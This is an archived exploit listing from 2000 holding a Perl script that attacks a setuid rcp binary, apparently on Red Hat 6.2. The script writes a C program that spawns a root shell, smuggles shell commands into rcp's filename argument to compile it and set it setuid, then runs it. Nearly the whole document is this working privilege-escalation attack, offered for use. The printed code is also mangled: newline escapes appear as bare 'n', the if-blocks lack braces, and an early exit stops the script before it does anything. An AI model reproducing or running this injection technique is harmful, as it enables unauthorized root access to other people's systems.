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# Title : rpc Suid Privledge Exploit
# Published : 2000-11-29
# Author : Tlabs
# Previous Title : Solaris locale Format Strings (noexec stack) Exploit
# Next Title : dump 0.4b15 exploit (Redhat 6.2)

#!/usr/bin/perl -w
# exploits suid privledges on rcp
# Not really tested this but hey
# works on redhat6.2
# not werk on freebsd4.1 stable
# bug discovered by
# Andrew Griffiths
# Exploit written by tlabs
# greetz to those that know me innit
# Please set your rcpfile
# this can be found by doing
# ls -alF `which rcp`
# have a lot of fun

$RCPFILE="/usr/bin/rcp" ;

# configure above innit

    print "$0nWritten by Tlabsn" ;
    exit 0 ;

if ( ! -u "$RCPFILE" )
    printf "rcp is not suid, quitingn" ;
    exit 0;

open(TEMP, ">>/tmp/shell.c")|| die "Something went wrong: $!" ;
printf TEMP "#include<unistd.h>n#include<stdlib.h>nint main()n{" ;
printf TEMP "    setuid(0);ntsetgid(0);ntexecl("/bin/sh","sh",0);ntreturn 0;n}n" ;
open(HMM, ">hey")|| die "Something went wrong: $!";
print HMM "Sploit written by tlabs, thanks to Andrew Griffiths for the bug report" ;

system "rcp 'hey geezer; gcc -o /tmp/shell /tmp/shell.c;' localhost 2> /dev/null" ;
system "rcp 'hey geezer; chmod +s /tmp/shell;' localhost 2> /dev/null" ;
printf "Ok, too easy, we'll just launch a shell, lets hope shit went well, innit:)n" ;

exec '/tmp/shell' ;

# www.Syue.com [2000-11-29]